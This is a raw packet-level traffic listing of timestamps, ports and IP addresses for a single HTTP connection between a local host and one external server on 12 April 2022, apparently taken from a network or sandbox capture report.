Apr 12, 2022 21:49:22.272103071 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272109985 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272130966 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272135973 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272155046 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272161007 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272180080 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272190094 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272205114 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272212029 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272234917 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272254944 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272259951 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272283077 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272285938 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272308111 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272311926 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272346020 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272346973 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272365093 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272371054 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272391081 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272397995 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272418022 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272423983 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272443056 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272449017 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272466898 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272473097 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272494078 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272500038 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272519112 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272525072 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272546053 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272552013 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272569895 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272578001 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272598982 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272603035 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272628069 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272629023 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272649050 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272655964 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272677898 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272680998 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272706985 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272707939 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272725105 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272732973 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272753000 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272758961 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272777081 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272785902 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272804022 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272811890 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272836924 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272840023 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272856951 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272862911 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272883892 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272887945 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272908926 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272913933 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272933006 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272939920 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272962093 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272964954 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272988081 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272991896 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273015022 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273016930 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273040056 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273045063 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273068905 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273080111 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273094893 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273101091 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273122072 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273130894 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273145914 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273147106 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273171902 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273173094 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273194075 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273199081 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273219109 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273224115 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273247004 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273251057 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273271084 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273276091 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273298025 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273299932 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273322105 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273324966 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273344994 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273350000 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273371935 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273375034 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273395061 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273401976 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273427010 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273431063 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273441076 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273459911 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273480892 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273499966 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273519993 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273540020 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273566008 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273591042 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273591042 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273617029 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273623943 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273643017 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273643017 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273663044 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273669004 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273694038 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273696899 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273710966 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273722887 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273740053 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273747921 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273763895 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273773909 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273788929 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273799896 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273817062 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273825884 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273842096 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273850918 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273868084 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273875952 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273893118 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273901939 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273915052 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273926973 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273942947 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273952007 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273974895 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.273977995 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.273998022 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274004936 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274023056 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274044037 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274068117 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274075031 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274095058 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274096966 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274117947 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274117947 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274142981 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274154902 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274182081 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274184942 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274198055 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274209023 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274224997 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274246931 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274250984 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274272919 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274298906 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274305105 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274322033 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274327993 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274347067 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274348974 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274373055 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274373055 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274396896 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274399042 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274419069 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274425030 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274451971 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274451971 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274476051 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274477959 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274493933 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274503946 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274518013 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274529934 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274554968 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274558067 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274580002 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274585009 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274606943 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.274621010 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.274651051 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.298491001 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.298535109 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.298558950 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.298590899 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.298619986 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.298825026 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.321326017 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.321371078 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.321397066 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.321419954 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.321439028 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.321460962 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.321588993 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.321604013 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.321607113 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.344258070 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.344321966 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.344362974 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.344369888 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.344400883 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.344404936 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.344432116 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.344446898 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.344458103 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.344489098 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.344496012 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.344530106 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.344544888 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.344568014 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.344588041 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.344607115 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.344615936 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.344713926 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.344738960 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345263004 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345309019 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345343113 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345346928 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345361948 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345388889 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345405102 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345429897 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345439911 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345470905 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345484018 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345511913 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345518112 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345551014 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345563889 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345592022 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345604897 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345633030 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345642090 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345671892 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345681906 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345712900 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345722914 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345765114 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345766068 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345805883 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345814943 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345846891 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345856905 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345885038 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345897913 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345926046 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345935106 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.345967054 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.345978975 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346007109 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346020937 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346057892 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346101999 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346162081 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346208096 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346250057 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346271038 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346333027 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346343994 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346371889 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346385956 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346411943 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346425056 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346451998 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346461058 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346493006 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346506119 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346535921 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346544027 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346575022 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346587896 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346616983 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346638918 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346667051 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346681118 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346707106 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346719027 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346746922 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346757889 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346786976 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346798897 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346828938 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346841097 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346873045 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346883059 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346911907 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346925020 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.346952915 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.346961975 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347002029 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347004890 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347047091 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347075939 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347089052 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347105026 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347130060 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347141027 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347171068 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347187042 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347213030 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347233057 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347251892 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347265005 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347292900 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347302914 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347335100 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347343922 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347373962 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347384930 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347414970 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347430944 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347455025 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347465992 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347496033 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347529888 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347537041 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347548962 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347577095 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347587109 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347616911 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347631931 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347657919 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347672939 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347695112 CEST	80	49780	45.137.22.163	192.168.2.7
